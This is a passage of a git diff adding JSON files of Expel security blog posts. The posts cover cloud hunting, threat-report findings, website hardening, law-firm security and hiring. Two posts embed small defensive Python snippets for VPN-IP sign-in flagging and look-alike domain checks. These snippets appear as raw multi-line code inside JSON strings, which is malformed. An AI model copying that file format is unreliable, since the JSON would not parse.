Anomaly detection platforms like Exabeam can excel in this department. Keep in mind that UEBA platforms do require a certain amount of supervision to keep the false positives at bay, but you\u2019ll have a better chance of surfacing up something that your traditional security tools might not catch. 2. Incident response is time consuming. There\u2019s a lot of data to sift through to paint the full picture of what happened after an incident occurs. UEBA platforms like Exabeam do a rad job of helping stitch all of that user or entity context together to provide you with a comprehensive timeline of attacker activity." +} \ No newline at end of file diff --git a/expel-hunting-now-in-the-cloud.json b/expel-hunting-now-in-the-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..aa99beeb27f7c390fdf43e88c012aa3fa234c13b --- /dev/null +++ b/expel-hunting-now-in-the-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "Expel Hunting: Now in the cloud", + "url": "https://expel.com/blog/expel-hunting-now-in-the-cloud/", + "date": "May 11, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Expel Hunting: Now in the cloud Security operations \u00b7 3 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAY 11, 2021 \u00b7 TAGS: Cloud security / Company news / Hunting / MDR / Tech tools Great security strategy is made up of a multi-layered approach. It involves, but isn\u2019t limited to, detecting suspicious activity in real time, using proactive security controls and policies \u2013 and if you have the time (try not to laugh too hard here) \u2013 actively looking (or hunting) for threats. Hunting has traditionally looked for spots where an attacker slipped through without setting off alarm bells. But with the current tech transformation \u2013 adoption of SaaS, use of cloud infrastructure, introduction of new (and amazing) services to make developers and users more efficient \u2013 we think it\u2019s time to expand on what hunting can find. Hunting gives you visibility into interesting things happening in your environment \u2013 like users modifying configurations or adding applications that can decrease your security posture along with activity that can indicate process breakdowns or genuinely suspicious activity. We think of these findings as insights. And these insights help our customers truly understand their environment and can keep bad stuff from happening. With more and more orgs using multiple cloud providers to store all the things, hunting (and the insights it produces) is an important part of any security strategy. Which is why we\u2019re introducing new hunting techniques for our customers that focus on \u2013 you guessed it \u2013 cloud. What\u2019s new Expel Hunting now offers coverage in Amazon Web Services (AWS) and Microsoft Azure to help find blind spots. We\u2019re newly armed with a set of targeted cloud hunts, focused on key pieces of information you may be missing. Transparency \u2013 We lay our cards on the table so you know exactly what we\u2019re doing for you. For every hunt, we\u2019ll show you the work that went into it. We\u2019ll tell you our methodology \u2013 mapped back to the MITRE ATT&CK framework, the data we pulled, what tech we used and the outcomes. It\u2019s important for you to see what we\u2019re doing and why \u2013 so you can learn too. Expanded scope \u2013 We\u2019re constantly adding to our library of hunt techniques based on activity we see among our clients. Which is why we\u2019ve added new hunts focused on cloud environments and applications. 
Insights \u2013 While we\u2019re running through your logs, we\u2019ll tell you what normal looks like for you and surface activity where something does not seem right. These findings give you visibility into your environment that you wouldn\u2019t have otherwise. You can put these insights into action and better secure your environment. What you\u2019ll get with Expel Hunting More value out of your existing tech No need to go out and buy more stuff. We\u2019ll hunt across your environment with the tools you\u2019ve already invested in. The more we connect to, the more we can hunt for. Breaking down these silos helps make your team and existing investments stronger. Uncover more than threats We hunt beyond what is malicious. As we comb through your data, we flag strange activity that falls outside of \u201cnormal,\u201d like misconfigurations in your infrastructure that could be increasing your cloud costs. With expanded insight into your environment, you\u2019ll get an in-depth analysis of your logs that shines light on anomalous activity that would not be found through detection. Hunt techniques aligned to your unique risks Do you want to hunt in the cloud, in SaaS apps or on-prem? You got it. We take a close look at your environment and let you know exactly what hunting techniques we can use and the types of things we\u2019re able to find. More sleep Don\u2019t lose sleep after reading the latest Reddit article that leaves you wondering: How do I know we\u2019re not affected? By working with Expel, you\u2019ll have more confidence when the latest threat strikes, knowing that we\u2019re protecting you against emerging threats and improving your security posture. (We can\u2019t, however, help with sleep problems related to noisy neighbors, pets, children with an inexplicable abundance of energy \u2026 you get the idea.) Ready to go on the hunt? We sure are. If you\u2019re curious as to what others think about Expel Hunting, take a look at the Q1 2021 Forrester Wave\u2122 Report, where Expel was ranked five out of five when it comes to threat hunting. Let us help so that your team can get back to focusing on the highest value security work \u2013 and get you back to doing what you love. Learn more about Expel Hunting" +} \ No newline at end of file diff --git a/expel-quarterly-threat-report-q3-top-5-takeaways.json b/expel-quarterly-threat-report-q3-top-5-takeaways.json new file mode 100644 index 0000000000000000000000000000000000000000..227e00deeb5ea494fe4e9eaf196ba15bebaeee1b --- /dev/null +++ b/expel-quarterly-threat-report-q3-top-5-takeaways.json @@ -0,0 +1,6 @@ +{ + "title": "Expel Quarterly Threat Report Q3: Top 5 takeaways", + "url": "https://expel.com/blog/expel-quarterly-threat-report-q3-top-5-takeaways/", + "date": "Nov 16, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Expel Quarterly Threat Report Q3: Top 5 takeaways Security operations \u00b7 3 MIN READ \u00b7 BEN BRIGIDA \u00b7 NOV 16, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Hi, and welcome\u2013it\u2019s Quarterly Threat Report (QTR) time. Our security operations center (SOC) sees hundreds of alerts each day, and the QTR series (this is the third installment) provides data and insight on what they are, how they work, how to spot them, what to do if you find them, as well as advice you can use to safeguard your organization. The findings draw on our investigations into alerts, email submissions, and threat hunting leads from July 1 to September 30, 2022.
We analyzed incidents across our customer base, spanning organizations of various shapes, sizes, and industries, and in the process, we distilled patterns and trends to help guide strategic decision-making and operational processes for your team. We employed a combination of time series analysis, statistics, customer input, and analyst instinct to identify key insights. Our goal: by sharing how attackers got in (or tried to) and how we stopped them, we\u2019ll translate our experiences into security strategies your organization can put into play today. Here are our top findings for the quarter. 1: Identity is still the new endpoint, and it shows no signs of slowing down. Identity-based attacks, which include credential theft, credential abuse, and long-term access key theft, accounted for nearly 60% of all incidents our SOC fielded in Q3. This is up three percentage points compared to Q2. Business email compromise (BEC\u2013unauthorized access into email apps) and business application compromise (BAC\u2013unauthorized access into application data) combined for 55% of all incidents, an increase of four percentage points from Q2. Identity-based attacks in popular cloud environments like Amazon Web Services (AWS) decreased slightly (by two percentage points, for 3% of the total). An interesting data point: 100% of BEC incidents occurred in Microsoft 365 (formerly Office 365) for the second quarter in a row. (We\u2019re pretty sure this is the result of attackers preparing for Microsoft\u2019s long-awaited disabling of Basic Auth for Exchange Online, which went into effect on October 1.) 2: Users increasingly let attackers in by approving fraudulent MFA pushes for BAC. Only about half the BAC incidents our SOC encountered resulted in the attacker successfully accessing the account. The other half was stopped by multi-factor authentication (MFA) or conditional access policies. The frustrating part is that MFA and conditional access were configured for more than 80% of the cases where the attackers were successful. Ideally, none of these hacks should have succeeded. However, the attackers tricked legitimate users into satisfying the MFA request by hitting them with a barrage of MFA requests, and eventually the users accepted one. The share of successful compromises that happened this way is up dramatically from last quarter, when only 14% of successful compromises came from repeated push notifications. The takeaway? To stop MFA push notification fatigue attacks, organizations can disable push notifications in favor of a PIN or a Fast Identity Online (FIDO)-compliant solution. If that\u2019s unrealistic, control push notifications using number matching\u2014a setting that requires the user to enter numbers from the identity platform into their MFA app to approve the authentication request. 3: Attackers use IPs geolocated in the U.S. when targeting U.S.-based organizations. If you\u2019re in the U.S. and think you only need to closely monitor for IPs outside the country attempting to access your environment\u2026here\u2019s your wake-up call. Almost half of the BEC attempts and successful BEC compromises we see originate from U.S.-based IP addresses. Also, all the authentication attempts originating from the U.S. came from an IP associated with a VPN or hosting provider. This tactic increases a hacker\u2019s chances of bypassing conditional access policies for source countries that either force the user into an MFA challenge or even flat out block the login.
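One way to act on that finding is to enrich each sign-in with the organization that owns the source IP and flag logins coming from hosting providers or commercial VPNs. Here's a minimal sketch of the idea; the sign-in records, the hard-coded enrichment table and the keyword list are stand-ins for whatever ASN or VPN-enrichment source you actually use.

# Stand-in enrichment data: in practice this would come from an ASN or
# VPN-enrichment lookup, not a hard-coded dictionary.
IP_ORG = {
    "203.0.113.10": "ExampleHosting LLC",
    "198.51.100.7": "Example Residential ISP",
}
SUSPICIOUS_ORG_KEYWORDS = ("hosting", "vpn", "cloud", "data center")

signins = [
    {"user": "jsmith", "ip": "203.0.113.10", "country": "US"},
    {"user": "adoe", "ip": "198.51.100.7", "country": "US"},
]

for signin in signins:
    org = IP_ORG.get(signin["ip"], "unknown").lower()
    if any(keyword in org for keyword in SUSPICIOUS_ORG_KEYWORDS):
        print(f"Review sign-in for {signin['user']}: {signin['ip']} ({org}) "
              f"from {signin['country']}")

In practice you'd feed this from your identity provider's sign-in logs and a real enrichment service, and route the hits into your alert queue rather than printing them.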
If attackers gain access to the account by harvesting user credentials instead of using brute force or another method, they can also harvest the user\u2019s IP (and therefore geolocation). For authentications, it\u2019s vital to have alerting based on the IP organization as well as VPN enrichment services. 4: Ransomware threat groups and their affiliates have abandoned Visual Basic for Applications (VBA) macros and Excel 4.0 macros in favor of zipped JavaScript or ISO files to infiltrate Windows-based environments. The top attack vectors used by ransomware groups to gain initial entry in Q3 were: Zipped JavaScript files (46% of all pre-ransomware incidents) Zipped ISO files (26%) Removable media (10%) Excel 4.0 macros (8%) In Q2, our SOC noted the trend of threat actors using zipped JavaScript and ISO files to deliver malware to gain initial access. Way back in Q1 (when Microsoft announced its plans to disable Excel 4.0 macros by default in Q3), a macro-enabled Microsoft Word document (VBA macro) or Excel 4.0 macro was the initial attack vector in 55% of all pre-ransomware incidents. 5: The top subject line theme for malicious emails was\u2026no subject line at all (followed by \u201cInvoice,\u201d \u201cOrder confirmation,\u201d \u201cPayment,\u201d and \u201cRequest\u201d). Sneaky, cheeky hackers. While the specific wording may change, our data shows that threat actors love a good theme when it comes to subject lines. The top malicious theme? No subject line. Nada. Blank. The rest are what you\u2019d expect\u2014invoice, order, payment, urgent, etc. These high spots are just what a foodie would call an \u201camuse-bouche.\u201d There\u2019s so much more (including a fun mystery that we\u2019re working to unravel), and odds are pretty good the full QTR offers some insights and advice your team can make use of. Download yours here, and if you have questions or comments, drop us a line." +} \ No newline at end of file diff --git a/five-quick-checks-to-prevent-attackers-from-weaponizing.json b/five-quick-checks-to-prevent-attackers-from-weaponizing.json new file mode 100644 index 0000000000000000000000000000000000000000..63babf82ba7ff1941070c99b6685a157442cb25d --- /dev/null +++ b/five-quick-checks-to-prevent-attackers-from-weaponizing.json @@ -0,0 +1,6 @@ +{ + "title": "Five quick checks to prevent attackers from weaponizing ...", + "url": "https://expel.com/blog/prevent-attackers-from-weaponizing-website/", + "date": "Aug 22, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Five quick checks to prevent attackers from weaponizing your website Tips \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 AUG 22, 2018 \u00b7 TAGS: Get technical / Heads up / How to / Overview / Vulnerability If you work in security, chances are good you got an email from someone Monday (August 20, 2018) asking if your organization was \u201csafe\u201d from the attacks by the Russian threat group APT28 (also called Fancy Bear) that Microsoft announced. Microsoft and other large infrastructure providers are in a unique position to see potentially malicious activity and determine not just the target, but the source of the attack as well. In this case, they\u2019ve identified yet another attack from APT28, an organization with a history of interfering with the U.S. democratic process.
And beyond simply announcing these attacks and the takedown of the malicious websites, Microsoft is also rolling out a program \u201cfree of charge to candidates, campaigns and related political institutions using Office 365.\u201d But if you\u2019re not a candidate, campaign or related political institution, what\u2019s your takeaway from this announcement? What would they want with your website? You may be thinking \u201cwe aren\u2019t a target for nation-state actors.\u201d While that\u2019s true for many, there are lots of different types of attackers that may be very interested in your website. Here are some of the most frequent ways attackers can use your website and your web presence to harm your company, your users and the public at large. Serving up malware: By embedding malware into an existing website, attackers trade on the trust you\u2019ve built with your users to compromise their machines. The embedded malware then executes \u201cdrive-by\u201d attacks on your users that can significantly damage your brand and impact a large number of people. A Chinese hacker group did this to target specific individuals registering for a foreign trade lobbying group ahead of a China-US presidential summit. Spoofing your website: Attackers can create websites with addresses similar to yours, using domain names that are confusingly similar to the websites you already own. By tricking users into going to these fake sites, attackers can harvest credentials and plant malware to gain access to the users\u2019 systems. For example, in this recent Microsoft announcement, the domain \u201cmy-iri.org\u201d was meant to imitate the International Republican Institute located at the domain \u201ciri.org.\u201d Getting into your infrastructure: Best practice is to keep your external website separate from your infrastructure. But that\u2019s not always practical. If your website is connected to other parts of your network, an attack against your website can serve as a gateway for attackers to move further into your enterprise. Denial of service: Your website is your primary face to your customers. It\u2019s also the place where angry customers can express their dissatisfaction. Hopefully, unsatisfied customers will stick to filling out a web form to lodge their complaint. But if they\u2019re bored and skilled, occasionally they\u2019ll take it to the next level and launch a denial of service attack to take your whole web presence offline. The size and scope of DoS attacks have increased dramatically over the last year, according to Arbor. Defacement: Once a common activity on the Internet, defacements have waned over the years. But hacktivists and other threat actors still target websites to gain control and change content to promote their ideology. Defacements are often crude, but they can still be jarring to your users and impact your company\u2019s reputation. Five things you can do Managing cyber risk is a balancing act of cost versus risk, and your specific situation will be unique to your own organization. But there are some general truisms when it comes to securing your web presence and we\u2019ve pulled together five recommendations that should apply to most organizations. Two factor everywhere: In general, you should use two-factor authentication (2FA) anywhere possible. But, in particular, when it\u2019s your website, you should enable 2FA for administrators to limit the impact of compromised passwords. Many content management systems (CMS) don\u2019t have 2FA support natively.
However, there are plugins for every major CMS that enable 2FA support with common one-time password solutions. Don\u2019t run your own website: Really, running a website is a lot of work. Maintaining the operating system, staying current on the content management system, staying current on best configurations and practices and monitoring for various attacks is more effort than many companies are willing to put into their website. The good news is that you can pay others to run websites for relatively cheap, sometimes even free depending on what your requirements are. If you\u2019re running your website today, consider outsourcing it as soon as possible. Monitor for look-alike domains: Your website only has one correct spelling. Your users, however, don\u2019t really pay that much attention, and there are many misspellings and deceptively named domains that may trick them into visiting a malicious site. There are lots of services that you can use to monitor potentially malicious domain registrations so you can work with registrars to take down infringing domains and warn your users. Patch and audit: If you do run your own website, you\u2019ve got to stay current on patches. Modern CMS\u2019s make patching easy. Usually it just takes the push of a button. That\u2019s super important because attackers can weaponize published vulnerabilities in CMS\u2019s in a matter of hours. It\u2019s important that you patch as soon as possible and audit administrative access logs for suspicious activity. Limit plugins: Historically, CMS\u2019s have been a disaster from a security perspective. However, due to the risk they represent to websites, most CMS\u2019s have really stepped up their game and are relatively secure. The weak link is now the plugins that users install to add functionality. Be sure to vet your plugins before you install them. Some have been well written and audited; others are sort of \u201cfly by night\u201d and have little to no support or documentation. Often, hosted CMS providers have a list of acceptable plug-ins. These lists are usually a good starting point to pick which ones you want to use. Conclusion So \u2026 back to that \u201care we safe\u201d email that higher-ups love to send after every headline. The guidance above should help you explain how and why attackers compromise websites and what you can do to prevent it. But once the latest headline passes, I\u2019d recommend using something like the NIST Cybersecurity Framework to explain your broader security strategy to execs. Once you school them on it, you\u2019ll find it\u2019s an invaluable tool that you can point to when the next headline hits about the risk they are consciously (or unwittingly) accepting based on the security investments they\u2019ve approved." 
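To make the look-alike domain monitoring tip more concrete, here's a minimal sketch of the matching side of that check. It assumes you already have a feed of candidate domains (new registrations, certificate transparency logs, or a commercial monitoring service); the brand string, edit-distance threshold and example domains are placeholders.

def edit_distance(a: str, b: str) -> int:
    # Classic dynamic-programming Levenshtein distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = curr
    return prev[-1]

OUR_DOMAIN = "example.com"   # your real registered domain
BRAND = "example"            # the brand string users recognize

# Assumed input: candidate domains pulled from a registration or
# certificate-transparency feed you already have access to.
candidates = ["examp1e.com", "example-support.com", "exarnple.net", "unrelated.org"]

for domain in candidates:
    name = domain.rsplit(".", 1)[0]
    if BRAND in name or edit_distance(name, BRAND) <= 2:
        print(f"Possible look-alike domain worth reviewing: {domain}")

Generating likely typo and homoglyph variants of your own domain up front (rather than scoring everything you see) is the other common approach, and the two combine well.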
+} \ No newline at end of file diff --git a/five-things-law-firms-can-do-now-to-improve-their-security.json b/five-things-law-firms-can-do-now-to-improve-their-security.json new file mode 100644 index 0000000000000000000000000000000000000000..e53e3ca41b2f4267abe730e0c571f4603bbc491c --- /dev/null +++ b/five-things-law-firms-can-do-now-to-improve-their-security.json @@ -0,0 +1,6 @@ +{ + "title": "Five things law firms can do now to improve their security ...", + "url": "https://expel.com/blog/5-things-law-firms-can-do-now-improve-security-tomorrow/", + "date": "Sep 5, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Five things law firms can do now to improve their security for tomorrow Security operations \u00b7 6 MIN READ \u00b7 AMANDA FENNELL \u00b7 SEP 5, 2019 \u00b7 TAGS: CISO / How to / Managed security / Planning Amanda Fennell is the Chief Security Officer at Relativity, the global legal technology company whose software platform is used by thousands of organizations around the world to manage large volumes of data and quickly identify key issues during litigation, internal investigations and compliance projects. Relativity has 180,000+ active users and works with 198 of the AM Law 200. Its SaaS platform, RelativityOne, is the fastest-growing product in company history. I joined Relativity in January 2018 and it took battling a blizzard in Chicago to walk through the doors that day. Similarly, the weather in the security landscape hasn\u2019t let up in the past year and a half. Larger organizations receive a lot of direction and attention to navigate these cyber storms, but it can be difficult for organizations without a lot of data \u2014 or the right connections \u2014 to clear frameworks like PCI or HIPAA. Legal services organizations, including law firms, are a big part of our user community and we know that this industry needs and is demanding more guidance, info and standards on protecting client data. I\u2019m often asked about how legal services organizations and law firms approach security and if it\u2019s different from the other industries I\u2019ve worked in, or managed the security for, throughout my career. Security hasn\u2019t always been at the forefront for legal services companies and law firms. But the legal services industry presents a softer target for many adversaries, and the data loss from a successful intrusion can lead to stolen intellectual property, merger and acquisition details or even direct financial manipulation. Financial gain is still the major motivation in cyber attacks, with the exception of a few industries \u2014 meaning that the legal services industry will always be on the target list. Developing a mature security program is often a very expensive venture for small to medium-sized firms but I\u2019ve met many forward-thinking security leaders in the industry who\u2019ve been able to make some swift and lengthy strides in protecting their clients\u2019 data. Here are five specific things that orgs in the legal industry can do right now to create immediate, measurable security benefits. #1 \u2013 Perform a risk assessment One thing I\u2019ve observed is that firms that have more mature security approaches also tend to have a better understanding of the risks they face. If you\u2019re proactive about security, you\u2019ll be a pace setter amongst your peers. No matter your org\u2019s size, conducting a risk assessment is a critical first step \u2013 whether you do it in house or hire an external firm. 
It may be intimidating, particularly if you haven\u2019t previously done a risk assessment, but making even relatively minor changes in organizational or employee behavior can shrink some of your largest risks. In order to fully understand where gaps exist, it\u2019s necessary to assess your current level of risk. You\u2019ll also find a more positive reception from the partners in your firm when you turn security into a risk-based discussion versus a cost-based discussion since they help clients manage risk every single day. #2 \u2013 Vet your partners Law firms rely heavily on third-party partners and vendors \u2014 and they place a lot of trust in these other companies. As we learned from the Target breach in 2013 , trusting vendors implicitly without doing your due diligence can have disastrous results. Attackers target law firms to get access to their clients\u2019 data and they target the vendors used by law firms to exploit that relationship and bypass more difficult routes of compromise. It\u2019s essential that you vet partners and vendors to ensure their security meets your own standards and requirements. Supply chain attacks are often a very successful attack vector against orgs with a shortage of security talent \u2014 which brings me back to knowing what\u2019s at risk in your org and where you should focus your efforts. The vetting process typically begins with checking compliance certifications such as the ISO 27000 standards and SOC 2-Type 2, along with industry-specific certifications such as HIPAA, PCI, and others as applicable. For your closest and most important partners, you should have frank conversations with them about how you both view security. Do you have alignment and the same expectations? Do you share the same vision? Have you established mutual trust? Frequently ensuring your partners and vendors are doing security correctly is overlooked. It is important to ensure that you don\u2019t allow your most trusted allies to become your greatest source of risk. #3 \u2013 Embrace the human element (aka phishing) The most common attack vector is still phishing. The legal industry is no different in that this method is highly effective and can lead to devastating results. The good news is that with some education, training and good tech, your firm can successfully mitigate this threat. Teaching your employees to recognize a phishing email and what steps to take when they receive one is an easy and effective place to start. At Relativity we host regular phishing simulations to train our employees to identify phishing emails and the results have been very rewarding. In looking at our initial phishing email campaign and comparing it to the most recent simulation, we saw a drop of 40% in terms of employees taking incorrect actions. We treat each Relativian as a cyber warrior in the battle to protect our and our customers\u2019 data. Humans have the ability to be our greatest strength against phishing or social engineering attempts, rather than a weak link in the chain \u2014 but it\u2019s our job as security professionals to inspire and educate them. #4 \u2013 Pay attention to what\u2019s happening to other firms Once you\u2019ve identified your largest risks and then start addressing the basics, it\u2019s time to think more proactively about how you can stay ahead of emerging threats. One method of accomplishing this is to pay attention to what\u2019s happening at other firms from a security perspective. 
Read law trades about incidents at other firms, talk to your peers, attend industry events like ILTACON or Relativity Fest and participate in the Legal Services Information Sharing Organization (LS-ISAO) . There\u2019s nothing more useful in security than the human connections we make with others who are struggling with similar issues or concerns. Organizations and firms represent a spectrum of security maturity at these events. Attendees find not only how others have resolved concerns that are similar to their own, but also how to stay ahead of the threats that are most commonly targeted at the legal services industry. Attacks are growing exponentially and everyone is suffering \u2014 which is why we developed our threat intelligence feed that\u2019s focused on the legal services industry for our RelativityOne customers. We collect and correlate data from our honey networks and from all the customers we work with \u2014 then we anonymize it and make it true threat intelligence that we share. This provides our customers with an industry-wide look at threats relevant to firms or organizations just like their own. This allows even small and medium-sized orgs and firms to take advantage of up-to-date, real-time, actionable threat intelligence to strengthen their security posture. Focusing on where your blind spots are is key to preventing a potential breach. What might appear to be random scanning from one log can be correlated to other activity and may identify behaviors of an advanced persistent threat (APT) actor attempting to compromise a law firm through a remote desktop viewer (yes, this actually happened). #5 \u2013 Bake security into everything you do As the adage goes, \u201csecurity isn\u2019t something you buy, it\u2019s something you do.\u201d Improving your security posture is a process that will take time. When security is a priority, you\u2019ll see security advocates getting a seat at the table for important business discussions and decisions. Partners want the security team to weigh in and green light their decisions. Security is about managing risk. Another sign of security maturity is seeing security baked into many processes such as the Secure Software Development Lifecycle (SDLC). The security team \u2014 or lead partner who manages security \u2014 should be consulted for security impact assessments, vendor reviews, major decisions in engineering, every project that is going to affect the code and many other business decisions that need to be made. Security is everyone\u2019s responsibility A few years ago during a keynote address at Relativity Fest London, our founder Andrew Sieja said something I\u2019ll never forget: \u201cIt\u2019s an honor and a privilege to be a part of the legal profession \u2013 and that\u2019s something every lawyer feels.\u201d That stuck with me because it highlights the great responsibility we have to all our clients using the Relativity platform and RelativityOne, our secure SaaS platform hosted in the Microsoft Azure cloud. We\u2019re helping them do important work and part of that partnership means keeping their information and their clients\u2019 information secure through our work in the Calder7 security group and our company-wide commitment to building a culture of security. Hopefully some of these tips will help you improve your security posture. If, on the flip side, you\u2019re looking at these five tips and saying, \u201cI\u2019ve already done that,\u201d then help others. 
Speak at conferences, publish whitepapers or collaborate on a blog post with a partner. We love quoting Winston Churchill in Calder7: \u201cOur fight is hard. It will also be long \u2026 but win or lose, we must do our duty.\u201d" +} \ No newline at end of file diff --git a/five-things-that-ll-help-you-determine-whether-you-ll-like.json b/five-things-that-ll-help-you-determine-whether-you-ll-like.json new file mode 100644 index 0000000000000000000000000000000000000000..87a8eadfcea6112ece9273664ab0ee5b438dc18e --- /dev/null +++ b/five-things-that-ll-help-you-determine-whether-you-ll-like.json @@ -0,0 +1,6 @@ +{ + "title": "Five things that'll help you determine whether you'll like ...", + "url": "https://expel.com/blog/five-things-help-determine-like-working-at-company/", + "date": "Nov 12, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Five things that\u2019ll help you determine whether you\u2019ll like working at a company Talent \u00b7 6 MIN READ \u00b7 JEREMY FURNISS \u00b7 NOV 12, 2019 \u00b7 TAGS: Employee retention / Great place to work / Hiring \u201cGrowth only happens when you are uncomfortable.\u201d My wife and I say this to our kids all the time. But here\u2019s the funny thing: For all the advice I give to my children on a regular basis, there are moments when as a parent you have to live the advice you give and lead by example. Earlier this year, I found myself at a crossroads in my career. After spending time working in industries for which I had very little innate passion (even though I was \u201csuccessful\u201d selling in this space), I had to figure out if I wanted to stay the course or try something new. Sure, I could continue doing what I was doing, but would that really bring me career satisfaction for the next 15 years? The biggest challenge I was wrestling with is that I stopped believing that the products I was selling were truly making an impact. I could have continued down the path I was on, selling software solutions to the people and companies I already knew, or I could enter into the field of cybersecurity and try something new in an industry that I\u2019d always wanted to explore. Inherently I always had an inclination that I wanted to be a good guy who stopped bad guys \u2014 I was always drawn to traditional law enforcement. But many years ago I decided that wasn\u2019t the path for me and that I preferred working in computer software \u2026 so a job in cybersecurity made sense. So when a friend of mine encouraged me to take a look at Expel \u2014 a company he thought might be a great fit for me \u2014 I was excited. But I pushed off applying for weeks because I assumed they would have no interest in someone who didn\u2019t \u201cgrow up\u201d speaking cybersecurity. However, the more research I did about Expel, the more it occurred to me that they just might value the fact that I\u2019d bring a different perspective and set of skills with me to the company. So I submitted my resume and landed an interview. And while Expel was interviewing me, I interviewed them as well \u2014 making sure the company was truly a place I\u2019d want to work. Was this a place where I\u2019d fit in? Where I\u2019d get the support I needed? Could I envision myself being there for years to come? Here are five key things I looked for during my interview process to help me figure out the answers to all those questions and more. Sense of humor It all started with the job description. (If you\u2019ve never seen an Expel job posting, you can check some out right here .) 
After working for years in an industry rife with buzzwords, it was refreshing to find a company that doesn\u2019t take itself too seriously. The employees I met at Expel were no different. They were whip-smart and hard-working, but they also knew when to crack a joke and relax. When you see an Austin Powers movie poster on the wall, you know you\u2019re not in a traditional, stuffy office environment. As I walked through the office for the first time, I also noticed the meeting rooms had funny names \u2014 Pick Your Brain, Out of the Box, and Let\u2019s Unpack This, to name a few \u2014 because the team likes to poke fun at (and avoid using) business buzzwords and industry jargon. Even in the absence of clever conference room names, you can still figure out by looking around an office if the employees are stressed out and chained to their desks, or if they\u2019re relaxed and happy about coming to work. Take notice and think about whether it looks like an environment you\u2019d want to work in. Genuine respect for employees (and people in general) On Expel\u2019s Careers page , the first sentence says it all: \u201cAt Expel, we believe if we take care of our employees, they will take care of our customers, and the rest will work itself out.\u201d Many companies say they care about their employees, but those claims quickly unravel when it\u2019s time to demonstrate that care and respect. Most companies view employees as interchangeable cogs in their revenue machine \u2014 thinking of them more as \u201chuman resources\u201d instead of people. But the reality is that customers buy from people they like and trust. Which means that the people (and how a company treats them) matter a lot. Being passionate about your company and the problems its products solve comes through loud and clear in the sales process. A customer can tell if you personally believe in the company and the solution or not. A customer can also tell if an employee is happy . During your interview process, think about what makes you happy at work. Beyond a great product or solution that you believe in, what else do you need personally to succeed? Ask about those things during your interviews. A no-BS attitude toward selling The simplicity of the sales process at Expel really appealed to me. This line from the job description is completely accurate: \u201cMaybe they need your thing, maybe they don\u2019t, but they trust you and you\u2019ll get 30 minutes to see if there\u2019s a fit.\u201d Now that I\u2019m part of the Expel team, I can tell you that the discussions we have with potential customers are so refreshing. There\u2019s clean and concise dialogue. There\u2019s collaboration. There\u2019s a real desire to solve a problem and help a customer. I like that Expel takes all the old school, annoying sales tactics \u2014 the long PowerPoint presentations, the long lunches, the finger pistols \u2014 out of the sales process. As I think about how Expel\u2019s sales process differs from others that I\u2019ve experienced, I always wonder, \u201cWhy doesn\u2019t everyone do business this way?\u201d Dive deep with your interviewers to figure out what the sales process really looks like. Ask for real-life examples of engagements with prospects. Culture of transparency Expel doesn\u2019t just talk about culture and transparency. The company puts it into practice. From my first phone interview to the moment I walked into the office in Herndon as a full-time hire, the culture permeates the environment. The people are genuine.
Everyone is inherently driven by the success of the company versus personal success. In most sales teams the environment is typically one full of selfish motives and attitudes, especially when a new rep joins the team and takes a piece of someone else\u2019s pie. But from day one, my colleagues at Expel have been my coaches and advocates to accelerate my path to success, including me in calls with prospects and sharing their resources and tips that have helped them along the way. Will your new company help you get up to speed and share their lessons learned so that you can be successful? Or do they take an \u201cevery (wo)man for herself\u201d approach to sales? Ongoing support and encouragement The hiring process reminded me of one of my favorite books: \u201cGood to Great\u201d by Jim Collins . For the culture to scale as we continue to grow, we have to get the right people on the bus \u2014 and that doesn\u2019t necessarily mean people with the \u201cright\u201d industry knowledge. Sure, that\u2019s helpful, but there are certain traits we look for here at Expel that can\u2019t easily be taught. The leadership team knew I didn\u2019t have a cybersecurity background but they were committed to teaching me about the industry. The team gave me access to online training modules for security novices, which were so valuable in expediting my onboarding timeline. Key leaders within our company gave me their time as part of a sales enablement program which laid out the roadmap for success. Make sure to ask about what kind of support you have. What does that support look like, and who\u2019s it coming from? One month later \u2026 After starting with Expel one month ago, it\u2019s exceeded my expectations. Prior to my first day, an amazing welcome box showed up on my doorstep (I\u2019m a remote employee), which I shared in this post . From that day forward, the journey\u2019s been exciting for our entire family. Our four kids have asked questions, watched cybersecurity tutorial videos, and more \u2014 and now my youngest says that Expel is like \u201cBatman for the computer.\u201d They\u2019re now more interested in understanding what their Daddy does every day, which they\u2019ve never taken much interest in before. As a working parent, one thing I hope to model for my children is how to be not just content with but energized by your work. By carefully contemplating my next career move, asking lots of questions and finding a company with a culture that felt very \u201cme,\u201d I get to show them what that great energy looks like every day. They\u2019ve seen firsthand how stepping outside my comfort zone has blessed us to be a part of an amazing opportunity to change the market for managed security providers." 
+} \ No newline at end of file diff --git a/four-common-infosec-legal-risks-and-how-to-mitigate-them.json b/four-common-infosec-legal-risks-and-how-to-mitigate-them.json new file mode 100644 index 0000000000000000000000000000000000000000..49c15bc990b0340dfc33c168cce438543fbbcad7 --- /dev/null +++ b/four-common-infosec-legal-risks-and-how-to-mitigate-them.json @@ -0,0 +1,6 @@ +{ + "title": "Four common infosec legal risks and how to mitigate them", + "url": "https://expel.com/blog/four-common-infosec-legal-risks-how-to-mitigate/", + "date": "Apr 24, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Four common infosec legal risks and how to mitigate them Tips \u00b7 4 MIN READ \u00b7 MARC ZWILLINGER AND MARCI ROSEN \u00b7 APR 24, 2019 \u00b7 TAGS: Cloud security / Managed security / Management / Planning / Security Incident Marc Zwillinger and Marci Rozen are attorneys at ZwillGen PLLC and are based in Washington, D.C. They both counsel clients on information security and privacy issues, handle incident response and advise on cross-border data protection. All views expressed in this article are the authors\u2019 personal observations, and should not be attributed to ZwillGen, any of its other attorneys, or any of its clients. With major data breach settlements capturing headlines every few weeks, most executives are well aware that security incidents pose legal and even existential risk to companies. But as regulatory interest in information security grows, companies face an increasingly broad and varied set of risks in this area. Here are four missteps we see happen often that open fast-growing companies up to unnecessary legal risks. The good news? There are some straightforward 